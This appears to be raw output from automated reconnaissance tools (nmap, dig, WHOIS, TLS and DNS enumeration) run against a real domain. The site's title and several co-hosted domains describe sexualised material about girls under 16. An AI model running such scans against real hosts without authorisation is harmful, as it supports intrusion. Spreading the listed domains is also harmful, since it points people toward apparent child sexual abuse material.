574[*] http://www.ygmt.info/top50/index.php?a=stats&u=83
575[*] http://www.ygmt.info/top50/index.php?a=stats&u=87
576[*] http://www.ygmt.info/top50/index.php?a=stats&u=9
577[*] http://www.ygmt.info/top50/index.php?a=stats&u=93
578[*] http://www.ygmt.info/top50/index.php?a=stats&u=95
579[*] http://www.ygmt.info/top50/index.php?a=stats&u=98
580[*] http://www.ygmt.info/top50/index.php?a=user_cpl
581[*] http://www.ygmt.info/top50/index.php?cat=Book+Stores
582[*] http://www.ygmt.info/top50/index.php?cat=Free+Sites
583[*] http://www.ygmt.info/top50/index.php?cat=Nonude+Sites
584[*] http://www.ygmt.info/top50/index.php?cat=Pay+Sites
585[*] http://www.ygmt.info/top50/index.php?cat=Security
586[*] http://www.ygmt.info/top50/index.php?cat=Top+Lists
587[*] http://www.ygmt.info/top50/index.php?method=in&cat=Book+Stores&start=1
588[*] http://www.ygmt.info/top50/index.php?method=in&cat=Free+Sites&start=1
589[*] http://www.ygmt.info/top50/index.php?method=in&cat=Nonude+Sites&start=1
590[*] http://www.ygmt.info/top50/index.php?method=in&cat=Pay+Sites&start=1
591[*] http://www.ygmt.info/top50/index.php?method=in&cat=Security&start=1
592[*] http://www.ygmt.info/top50/index.php?method=in&cat=Top+Lists&start=1
593[INFO] GOOGLE has 497,000 results (0.15 seconds) about http://www.ygmt.info/
594[INFO] Shodan detected the following opened ports on 185.82.200.52:
595[*] 10000
596[*] 22
597[*] 443
598[*] 80
599[INFO] ------VirusTotal SECTION------
600[INFO] VirusTotal passive DNS only stores address records. The following domains resolved to the given IP address:
601[INFO] Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset:
602[INFO] Latest files that are not detected by any antivirus solution and were downloaded by VirusTotal from the IP address provided:
603[INFO] ------Alexa Rank SECTION------
604[INFO] Percent of Visitors Rank in Country:
605[INFO] Percent of Search Traffic:
606[INFO] Percent of Unique Visits:
607[INFO] Total Sites Linking In:
608[*] Total Sites
609[INFO] Useful links related to www.ygmt.info - 185.82.200.52:
610[*] https://www.virustotal.com/pt/ip-address/185.82.200.52/information/
611[*] https://www.hybrid-analysis.com/search?host=185.82.200.52
612[*] https://www.shodan.io/host/185.82.200.52
613[*] https://www.senderbase.org/lookup/?search_string=185.82.200.52
614[*] https://www.alienvault.com/open-threat-exchange/ip/185.82.200.52
615[*] http://pastebin.com/search?q=185.82.200.52
616[*] http://urlquery.net/search.php?q=185.82.200.52
617[*] http://www.alexa.com/siteinfo/www.ygmt.info
618[*] http://www.google.com/safebrowsing/diagnostic?site=www.ygmt.info
619[*] https://censys.io/ipv4/185.82.200.52
620[*] https://www.abuseipdb.com/check/185.82.200.52
621[*] https://urlscan.io/search/#185.82.200.52
622[*] https://github.com/search?q=185.82.200.52&type=Code
623[INFO] Useful links related to AS60117 - 185.82.200.0/24:
624[*] http://www.google.com/safebrowsing/diagnostic?site=AS:60117
625[*] https://www.senderbase.org/lookup/?search_string=185.82.200.0/24
626[*] http://bgp.he.net/AS60117
627[*] https://stat.ripe.net/AS60117
628[INFO] Date: 05/10/19 | Time: 23:30:39
629[INFO] Total time: 1 minute(s) and 27 second(s)
630######################################################################################################################################
631[i] Scanning Site: http://www.ygmt.info
632
633
634
635B A S I C I N F O
636====================
637
638
639[+] Site Title: Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models
640[+] IP address: 185.82.200.52
641[+] Web Server: Apache/2.4.10 (Debian)
642[+] CMS: Could Not Detect
643[+] Cloudflare: Not Detected
644[+] Robots File: Could NOT Find robots.txt!
645
646
647
648
649W H O I S L O O K U P
650========================
651
652 Domain Name: YGMT.INFO
653Registry Domain ID: D38820258-LRMS
654Registrar WHOIS Server: whois.1and1.com
655Registrar URL: http://registrar.1and1.info
656Updated Date: 2019-09-08T20:45:14Z
657Creation Date: 2011-07-08T14:47:10Z
658Registry Expiry Date: 2020-07-08T14:47:10Z
659Registrar Registration Expiration Date:
660Registrar: 1&1 IONOS SE
661Registrar IANA ID: 83
662Registrar Abuse Contact Email: abuse@1and1.com
663Registrar Abuse Contact Phone: +1.8774612631
664Reseller:
665Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
666Registrant Organization: Data Privacy Protected
667Registrant State/Province: BW
668Registrant Country: DE
669Name Server: FREEDNS1.REGISTRAR-SERVERS.COM
670Name Server: FREEDNS2.REGISTRAR-SERVERS.COM
671Name Server: FREEDNS3.REGISTRAR-SERVERS.COM
672Name Server: FREEDNS4.REGISTRAR-SERVERS.COM
673Name Server: FREEDNS5.REGISTRAR-SERVERS.COM
674DNSSEC: unsigned
675URL of the ICANN Whois Inaccuracy Complaint Form is https://www.icann.org/wicf/
676>>> Last update of WHOIS database: 2019-10-06T03:23:16Z <<<
677
678For more information on Whois status codes, please visit https://icann.org/epp
679
680
681
682
683
684G E O I P L O O K U P
685=========================
686
687[i] IP Address: 185.82.200.52
688[i] Country: Netherlands
689[i] State: North Holland
690[i] City: Amsterdam
691[i] Latitude: 52.35
692[i] Longitude: 4.9167
693
694
695
696
697H T T P H E A D E R S
698=======================
699
700
701[i] HTTP/1.1 200 OK
702[i] Date: Sun, 06 Oct 2019 03:24:18 GMT
703[i] Server: Apache/2.4.10 (Debian)
704[i] Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
705[i] ETag: "a0d-583eebde65fc0"
706[i] Accept-Ranges: bytes
707[i] Content-Length: 2573
708[i] Vary: Accept-Encoding
709[i] Connection: close
710[i] Content-Type: text/html
711
712
713
714
715D N S L O O K U P
716===================
717
718ygmt.info. 1799 IN A 185.82.200.52
719ygmt.info. 1799 IN NS freedns1.registrar-servers.com.
720ygmt.info. 1799 IN NS freedns2.registrar-servers.com.
721ygmt.info. 1799 IN NS freedns3.registrar-servers.com.
722ygmt.info. 1799 IN NS freedns4.registrar-servers.com.
723ygmt.info. 1799 IN NS freedns5.registrar-servers.com.
724ygmt.info. 3600 IN SOA freedns1.registrar-servers.com. hostmaster.registrar-servers.com. 2019030105 43200 3600 604800 3601
725
726
727
728
729S U B N E T C A L C U L A T I O N
730====================================
731
732Address = 185.82.200.52
733Network = 185.82.200.52 / 32
734Netmask = 255.255.255.255
735Broadcast = not needed on Point-to-Point links
736Wildcard Mask = 0.0.0.0
737Hosts Bits = 0
738Max. Hosts = 1 (2^0 - 0)
739Host Range = { 185.82.200.52 - 185.82.200.52 }
740
741
742
743N M A P P O R T S C A N
744============================
745
746Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-06 03:24 UTC
747Nmap scan report for ygmt.info (185.82.200.52)
748Host is up (0.077s latency).
749rDNS record for 185.82.200.52: latina.petite.guru
750
751PORT STATE SERVICE
75221/tcp closed ftp
75322/tcp open ssh
75423/tcp closed telnet
75580/tcp open http
756110/tcp closed pop3
757143/tcp closed imap
758443/tcp open https
7593389/tcp closed ms-wbt-server
760
761Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
762
763
764
765S U B - D O M A I N F I N D E R
766==================================
767
768
769[i] Total Subdomains Found : 1
770
771[+] Subdomain: www.ygmt.info
772[-] IP: 185.82.200.52
773######################################################################################################################################
774Enter Address Website = www.ygmt.info
775
776
777
778Reversing IP With HackTarget 'www.ygmt.info'
779-----------------------------------------------
780
781[+] alt.binaries.nymphs.us
782[+] alt.binaries.nymphs.ws
783[+] alt.binaries.pictures.youth-and-beauty.net
784[+] cdoll.top
785[+] forum.mclt.net
786[+] forum.nymphs.us
787[+] imageport.dyns.be
788[+] imageport.info
789[+] imageport.org
790[+] javpetite.top
791[+] macxhost.ma.cx
792[+] mclt.net
793[+] met-art.nymphs.us
794[+] myusenet.youth-and-beauty.net
795[+] nymphs.us
796[+] nymphs.ws
797[+] photo50.com
798[+] tinymodel.ma.cx
799[+] topsite.photo50.com
800[+] topsites.photo50.com
801[+] usenet.youth-and-beauty.net
802[+] www.cdoll.top
803[+] www.imageport.info
804[+] www.imageport.org
805[+] www.javpetite.top
806[+] www.mclt.net
807[+] www.nymphs.us
808[+] www.nymphs.ws
809[+] www.photo50.com
810[+] www.ygmt.info
811[+] www.youth-and-beauty.net
812[+] ygmt.info
813[+] youth-and-beauty.net
814
815
816
817Reverse IP With YouGetSignal 'www.ygmt.info'
818-----------------------------------------------
819
820[*] IP: 185.82.200.52
821[*] Domain: ygmt.info
822[*] Total Domains: 1
823
824[+] ygmt.info
825
826
827
828Geo IP Lookup 'www.ygmt.info'
829--------------------------------
830
831[+] IP Address: 185.82.200.52
832[+] Country: Netherlands
833[+] State: North Holland
834[+] City: Amsterdam
835[+] Latitude: 52.35
836[+] Longitude: 4.9167
837
838
839
840Whois 'www.ygmt.info'
841------------------------
842
843[+] Domain Name: YGMT.INFO
844[+] Registry Domain ID: D38820258-LRMS
845[+] Registrar WHOIS Server: whois.1and1.com
846[+] Registrar URL: http://registrar.1and1.info
847[+] Updated Date: 2019-09-08T20:45:14Z
848[+] Creation Date: 2011-07-08T14:47:10Z
849[+] Registry Expiry Date: 2020-07-08T14:47:10Z
850[+] Registrar Registration Expiration Date:
851[+] Registrar: 1&1 IONOS SE
852[+] Registrar IANA ID: 83
853[+] Registrar Abuse Contact Email: abuse@1and1.com
854[+] Registrar Abuse Contact Phone: +1.8774612631
855[+] Reseller:
856[+] Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
857[+] Registrant Organization: Data Privacy Protected
858[+] Registrant State/Province: BW
859[+] Registrant Country: DE
860[+] Name Server: FREEDNS1.REGISTRAR-SERVERS.COM
861[+] Name Server: FREEDNS2.REGISTRAR-SERVERS.COM
862[+] Name Server: FREEDNS3.REGISTRAR-SERVERS.COM
863[+] Name Server: FREEDNS4.REGISTRAR-SERVERS.COM
864[+] Name Server: FREEDNS5.REGISTRAR-SERVERS.COM
865[+] DNSSEC: unsigned
866[+] URL of the ICANN Whois Inaccuracy Complaint Form is https://www.icann.org/wicf/
867[+] >>> Last update of WHOIS database: 2019-10-06T03:23:42Z <<<
868[+] For more information on Whois status codes, please visit https://icann.org/epp
869
870
871
872DNS Lookup 'www.ygmt.info'
873-----------------------------
874
875[+] ygmt.info. 1799 IN A 185.82.200.52
876[+] ygmt.info. 1799 IN NS freedns1.registrar-servers.com.
877[+] ygmt.info. 1799 IN NS freedns2.registrar-servers.com.
878[+] ygmt.info. 1799 IN NS freedns3.registrar-servers.com.
879[+] ygmt.info. 1799 IN NS freedns4.registrar-servers.com.
880[+] ygmt.info. 1799 IN NS freedns5.registrar-servers.com.
881[+] ygmt.info. 3600 IN SOA freedns1.registrar-servers.com. hostmaster.registrar-servers.com. 2019030105 43200 3600 604800 3601
882
883
884
885Find Shared DNS 'www.ygmt.info'
886----------------------------------
887
888[+] No DNS server records found for ygmt.info
889
890
891
892Show HTTP Header 'www.ygmt.info'
893-----------------------------------
894
895[+] HTTP/1.1 200 OK
896[+] Date: Sun, 06 Oct 2019 03:25:09 GMT
897[+] Server: Apache/2.4.10 (Debian)
898[+] Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
899[+] ETag: "a0d-583eebde65fc0"
900[+] Accept-Ranges: bytes
901[+] Content-Length: 2573
902[+] Vary: Accept-Encoding
903[+] Content-Type: text/html
904[+]
905
906
907
908Port Scan 'www.ygmt.info'
909----------------------------
910
911Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-06 03:25 UTC
912Nmap scan report for www.ygmt.info (185.82.200.52)
913Host is up (0.080s latency).
914rDNS record for 185.82.200.52: latina.petite.guru
915
916PORT STATE SERVICE
91721/tcp closed ftp
91822/tcp open ssh
91923/tcp closed telnet
92080/tcp open http
921110/tcp closed pop3
922143/tcp closed imap
923443/tcp open https
9243389/tcp closed ms-wbt-server
925
926Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
927
928
929
930
931
932Traceroute 'www.ygmt.info'
933-----------------------------
934
935Start: 2019-10-06T03:25:15+0000
936HOST: web01 Loss% Snt Last Avg Best Wrst StDev
937 1.|-- 45.79.12.201 0.0% 3 0.7 0.7 0.6 0.7 0.0
938 2.|-- 45.79.12.0 0.0% 3 0.6 0.7 0.6 0.9 0.2
939 3.|-- 45.79.12.9 0.0% 3 0.7 7.5 0.5 21.2 11.9
940 4.|-- 199.245.16.65 0.0% 3 1.8 1.7 1.4 1.8 0.2
941 5.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
942 6.|-- ??? 100.0 3 0.0 0.0 0.0 0.0 0.0
943 7.|-- WORLDSTREAM.ear4.Amsterdam1.Level3.net 0.0% 3 112.2 112.2 112.2 112.2 0.0
944 8.|-- 109.236.95.185 0.0% 3 117.3 117.3 117.3 117.3 0.0
945 9.|-- 190.2.158.155 0.0% 3 112.0 111.9 111.9 112.0 0.0
946 10.|-- 185.106.120.66 0.0% 3 116.8 116.9 116.8 116.9 0.1
947 11.|-- latina.petite.guru 0.0% 3 116.4 116.4 116.4 116.4 0.0
948######################################################################################################################################
949;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 61022
950;; flags: qr rd ra; QUERY: 1, ANSWER: 7, AUTHORITY: 5, ADDITIONAL: 5
951
952;; QUESTION SECTION:
953;ygmt.info. IN ANY
954
955;; ANSWER SECTION:
956ygmt.info. 3601 IN SOA freedns1.registrar-servers.com. hostmaster.registrar-servers.com. 2019030105 43200 3600 604800 3601
957ygmt.info. 1800 IN A 185.82.200.52
958ygmt.info. 1800 IN NS freedns4.registrar-servers.com.
959ygmt.info. 1800 IN NS freedns1.registrar-servers.com.
960ygmt.info. 1800 IN NS freedns2.registrar-servers.com.
961ygmt.info. 1800 IN NS freedns5.registrar-servers.com.
962ygmt.info. 1800 IN NS freedns3.registrar-servers.com.
963
964;; AUTHORITY SECTION:
965ygmt.info. 1800 IN NS freedns3.registrar-servers.com.
966ygmt.info. 1800 IN NS freedns2.registrar-servers.com.
967ygmt.info. 1800 IN NS freedns4.registrar-servers.com.
968ygmt.info. 1800 IN NS freedns1.registrar-servers.com.
969ygmt.info. 1800 IN NS freedns5.registrar-servers.com.
970
971;; ADDITIONAL SECTION:
972freedns1.registrar-servers.com. 25231 IN A 45.58.122.82
973freedns2.registrar-servers.com. 25231 IN A 104.216.69.250
974freedns3.registrar-servers.com. 42360 IN A 195.154.94.174
975freedns4.registrar-servers.com. 677 IN A 95.141.37.127
976freedns5.registrar-servers.com. 677 IN A 54.36.109.15
977
978Received 376 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 90 ms
979######################################################################################################################################
980 <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +trace ygmt.info
981;; global options: +cmd
982. 82302 IN NS m.root-servers.net.
983. 82302 IN NS d.root-servers.net.
984. 82302 IN NS k.root-servers.net.
985. 82302 IN NS l.root-servers.net.
986. 82302 IN NS j.root-servers.net.
987. 82302 IN NS g.root-servers.net.
988. 82302 IN NS f.root-servers.net.
989. 82302 IN NS a.root-servers.net.
990. 82302 IN NS c.root-servers.net.
991. 82302 IN NS i.root-servers.net.
992. 82302 IN NS e.root-servers.net.
993. 82302 IN NS b.root-servers.net.
994. 82302 IN NS h.root-servers.net.
995. 82302 IN RRSIG NS 8 0 518400 20191018170000 20191005160000 22545 . s9jzg4vhpn/0jz/+2KSoxxtpNWBsxDL291IT6bgNJkqPySat+/z9/pRU 7WUgRXYn6HJNi/dUd5YB9qcXHZMlzPTsVPJ3P6vWtpUs14y44LCoqCUM FtCt7+Jzl7CZukiaBm+humJRicPAQ5jxjmCVETCJPj6eTww3rhFBwtz2 hSrAsQNMVPKF/wq/TINfYPeiqiClqUhNjc3mzlJ0xUXiGB3xiHDyxn0i fbEULSFqHH3oJbrfo/U1E9lhwo0vzEADgHndKEWKlj9zPbjJMSzWrczX j1i2CIWimSiKWRjpm52oG4sW5TN96dXmiRkZ4fQYCrrSG/3rOsz/ZUBP +YOl+A==
996;; Received 525 bytes from 38.132.106.139#53(38.132.106.139) in 40 ms
997
998info. 172800 IN NS b2.info.afilias-nst.org.
999info. 172800 IN NS d0.info.afilias-nst.org.
1000info. 172800 IN NS a2.info.afilias-nst.info.
1001info. 172800 IN NS a0.info.afilias-nst.info.
1002info. 172800 IN NS b0.info.afilias-nst.org.
1003info. 172800 IN NS c0.info.afilias-nst.info.
1004info. 86400 IN DS 8674 7 1 197789A2CBABA6FECD0B5AC88C5BC414CE1FC309
1005info. 86400 IN DS 8674 7 2 EC9B6082B96B5F87143696F2B483ACC9B2C433DCE0C94E70F1FF5648 CA18008B
1006info. 86400 IN RRSIG DS 8 1 86400 20191018170000 20191005160000 22545 . QEmrL6ABrDMe2Sweq1BBm3L7uQynQAao+vhiGNYt1xvi4nszIuupa7Eg boK5haMRlM558+DD7CRvhtLNo0NTBos0dYnrc9VkzEQyRtVD1a11K5Ug fiaFyr9gtZI+Rzg7Aqg7bbhKqTB0cdPBEvi7lKGUixRfPAj3UiH4JO18 j4yibiPUaq+cuBZkqw/2S+v/rHBG8Kf0y9R9gNovPaTOzAyAAz2l54lc co9/pQsjSnQIb83c8cq7CvIplwBkyPJ8fCvHvXzEwn3QTtKk209YBfpI tct3CVO57IIo86Wfui5xL8Bz9XHcfQS/ufgRYN82zzyrNDRpRgn6hsbO p/yYPQ==
1007;; Received 812 bytes from 202.12.27.33#53(m.root-servers.net) in 234 ms
1008
1009ygmt.info. 86400 IN NS freedns1.registrar-servers.com.
1010ygmt.info. 86400 IN NS freedns2.registrar-servers.com.
1011ygmt.info. 86400 IN NS freedns3.registrar-servers.com.
1012ygmt.info. 86400 IN NS freedns4.registrar-servers.com.
1013ygmt.info. 86400 IN NS freedns5.registrar-servers.com.
1014adnsd9nk7nk82he8h21rj0jjhj11o5gb.info. 3600 IN NSEC3 1 1 1 D399EAAB ADNVG6B2JJN9MIEU7DJB24BL7RG5MDPI NS SOA RRSIG DNSKEY NSEC3PARAM
1015adnsd9nk7nk82he8h21rj0jjhj11o5gb.info. 3600 IN RRSIG NSEC3 7 2 3600 20191027040239 20191006030239 4514 info. J9QhgwuDEGlMzu8v9A88wQpTsoMW60Cu4hO6aVDQak/EX7j0jZGZpAKl tdW+DuCEq/hDqgBP2E6iyEONDolBNTwPOIV5LYEUnsimWDg2b3BjWigd wvqtEK162QzW8puqP7hJHw/BqxcmCdlF8CrtgbOJsD3MxBQ8ra+VVnaO ync=
1016dd2jv9hj90psq8mbklcqs59d3q11ngn4.info. 3600 IN NSEC3 1 1 1 D399EAAB DD2P6FLTIF5QC3OE7G94FBDJD8R6K774
1017dd2jv9hj90psq8mbklcqs59d3q11ngn4.info. 3600 IN RRSIG NSEC3 7 2 3600 20191022152843 20191001142843 4514 info. ChzNmreP2hFC6tgy0d/1C9Bvf9mfPIdevJEgQA8BFdZ9xgX0EY4K2yC1 271WzBEIBoSV559CExavt4fFoYNIYm3Za0k+1Sj3W47HTcseva1lJ+fZ sSjH8mkkFwAMzsHsbBA72pLli8uVYkzkncBsxVmXsIQEp+DhLlDMR+uo Ves=
1018;; Received 661 bytes from 2001:500:41::1#53(a2.info.afilias-nst.info) in 30 ms
1019
1020ygmt.info. 1800 IN A 185.82.200.52
1021;; Received 54 bytes from 95.141.37.127#53(freedns4.registrar-servers.com) in 145 ms
1022
1023######################################################################################################################################
1024[*] Performing General Enumeration of Domain: ygmt.info
1025[-] DNSSEC is not configured for ygmt.info
1026[*] SOA freedns1.registrar-servers.com 45.58.122.82
1027[*] NS freedns2.registrar-servers.com 104.216.69.250
1028[*] NS freedns5.registrar-servers.com 54.36.109.15
1029[*] NS freedns3.registrar-servers.com 195.154.94.174
1030[*] NS freedns4.registrar-servers.com 95.141.37.127
1031[*] NS freedns1.registrar-servers.com 45.58.122.82
1032[-] Could not Resolve MX Records for ygmt.info
1033[*] A ygmt.info 185.82.200.52
1034[*] Enumerating SRV Records
1035[-] No SRV Records Found for ygmt.info
1036[+] 0 Records Found
1037######################################################################################################################################
1038
1039 AVAILABLE PLUGINS
1040 -----------------
1041
1042 RobotPlugin
1043 OpenSslCipherSuitesPlugin
1044 HttpHeadersPlugin
1045 CompressionPlugin
1046 FallbackScsvPlugin
1047 SessionRenegotiationPlugin
1048 OpenSslCcsInjectionPlugin
1049 SessionResumptionPlugin
1050 EarlyDataPlugin
1051 HeartbleedPlugin
1052 CertificateInfoPlugin
1053
1054
1055
1056 CHECKING HOST(S) AVAILABILITY
1057 -----------------------------
1058
1059 185.82.200.52:443 => 185.82.200.52
1060
1061
1062
1063
1064 SCAN RESULTS FOR 185.82.200.52:443 - 185.82.200.52
1065 --------------------------------------------------
1066
1067 * TLSV1_1 Cipher Suites:
1068 Forward Secrecy OK - Supported
1069 RC4 OK - Not Supported
1070
1071 Preferred:
1072 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1073 Accepted:
1074 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1075 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1076 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1077 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1078 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1079 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1080 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1081 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1082 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1083 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1084
1085 * TLSV1 Cipher Suites:
1086 Forward Secrecy OK - Supported
1087 RC4 OK - Not Supported
1088
1089 Preferred:
1090 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1091 Accepted:
1092 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1093 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1094 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1095 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1096 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1097 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1098 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1099 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1100 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1101 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1102
1103 * Downgrade Attacks:
1104 TLS_FALLBACK_SCSV: OK - Supported
1105
1106 * Deflate Compression:
1107 OK - Compression disabled
1108
1109 * TLS 1.2 Session Resumption Support:
1110 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1111 With TLS Tickets: OK - Supported
1112
1113 * TLSV1_2 Cipher Suites:
1114 Forward Secrecy OK - Supported
1115 RC4 OK - Not Supported
1116
1117 Preferred:
1118 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
1119 Accepted:
1120 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1121 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1122 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1123 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1124 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
1125 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 200 OK
1126 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1127 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
1128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
1129 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1130 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1131 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1132 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
1133 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
1134 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1135 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
1136 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
1137 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1138
1139 * Certificate Information:
1140 Content
1141 SHA1 Fingerprint: c46e6ea4c40d22da6302a416b68bf8a890b8f667
1142 Common Name: ygmt.info
1143 Issuer: COMODO RSA Domain Validation Secure Server CA
1144 Serial Number: 336350573905975174485940211738784696524
1145 Not Before: 2017-02-14 00:00:00
1146 Not After: 2018-02-14 23:59:59
1147 Signature Algorithm: sha256
1148 Public Key Algorithm: RSA
1149 Key Size: 2048
1150 Exponent: 65537 (0x10001)
1151 DNS Subject Alternative Names: ['ygmt.info', 'www.ygmt.info']
1152
1153 Trust
1154 Hostname Validation: FAILED - Certificate does NOT match 185.82.200.52
1155 Android CA Store (9.0.0_r9): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1156 Apple CA Store (iOS 12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1157 Java CA Store (jdk-12.0.1): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1158 Mozilla CA Store (2019-03-14): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1159 Windows CA Store (2019-05-27): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1160 Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
1161 Received Chain: ygmt.info --> Go Daddy Secure Certificate Authority - G2 --> Go Daddy Root Certificate Authority - G2 --> countryName=US, organizationName=The Go Daddy Group, Inc., organizationalUnitName=Go Daddy Class 2 Certification Authority
1162 Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
1163 Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
1164 Received Chain Order: FAILED - Certificate chain out of order!
1165 Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
1166
1167 Extensions
1168 OCSP Must-Staple: NOT SUPPORTED - Extension not found
1169 Certificate Transparency: NOT SUPPORTED - Extension not found
1170
1171 OCSP Stapling
1172 NOT SUPPORTED - Server did not send back an OCSP response
1173
1174 * OpenSSL CCS Injection:
1175 OK - Not vulnerable to OpenSSL CCS injection
1176
1177 * Session Renegotiation:
1178 Client-initiated Renegotiation: OK - Rejected
1179 Secure Renegotiation: OK - Supported
1180
1181 * SSLV2 Cipher Suites:
1182 Server rejected all cipher suites.
1183
1184 * SSLV3 Cipher Suites:
1185 Server rejected all cipher suites.
1186
1187 * OpenSSL Heartbleed:
1188 OK - Not vulnerable to Heartbleed
1189
1190 * TLSV1_3 Cipher Suites:
1191 Server rejected all cipher suites.
1192
1193 * ROBOT Attack:
1194 OK - Not vulnerable
1195
1196
1197 SCAN COMPLETED IN 27.82 S
1198 -------------------------
1199######################################################################################################################################
1200Domains still to check: 1
1201 Checking if the hostname ygmt.info. given is in fact a domain...
1202
1203Analyzing domain: ygmt.info.
1204 Checking NameServers using system default resolver...
1205 IP: 104.216.69.250 (United States)
1206 HostName: freedns2.registrar-servers.com Type: NS
1207 HostName: freedns2.registrar-servers.com Type: PTR
1208 IP: 54.36.109.15 (Germany)
1209 HostName: freedns5.registrar-servers.com Type: NS
1210 HostName: freedns5.registrar-servers.com Type: PTR
1211 IP: 195.154.94.174 (France)
1212 HostName: freedns3.registrar-servers.com Type: NS
1213 HostName: freedns3.registrar-servers.com Type: PTR
1214 IP: 95.141.37.127 (Italy)
1215 HostName: freedns4.registrar-servers.com Type: NS
1216 HostName: freedns4.registrar-servers.com Type: PTR
1217 IP: 45.58.122.82 (United States)
1218 HostName: freedns1.registrar-servers.com Type: NS
1219
1220 Checking MailServers using system default resolver...
1221 WARNING!! There are no MX records for this domain
1222
1223 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
1224 No zone transfer found on nameserver 195.154.94.174
1225 No zone transfer found on nameserver 45.58.122.82
1226 No zone transfer found on nameserver 104.216.69.250
1227 No zone transfer found on nameserver 54.36.109.15
1228 No zone transfer found on nameserver 95.141.37.127
1229
1230 Checking SPF record...
1231 No SPF record
1232
1233 Checking 192 most common hostnames using system default resolver...
1234 IP: 185.82.200.52 (Netherlands)
1235 HostName: www.ygmt.info. Type: A
1236
1237 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
1238 Checking netblock 185.82.200.0
1239 Checking netblock 195.154.94.0
1240 Checking netblock 54.36.109.0
1241 Checking netblock 45.58.122.0
1242 Checking netblock 104.216.69.0
1243 Checking netblock 95.141.37.0
1244
1245 Searching for ygmt.info. emails in Google
1246
1247 Checking 6 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
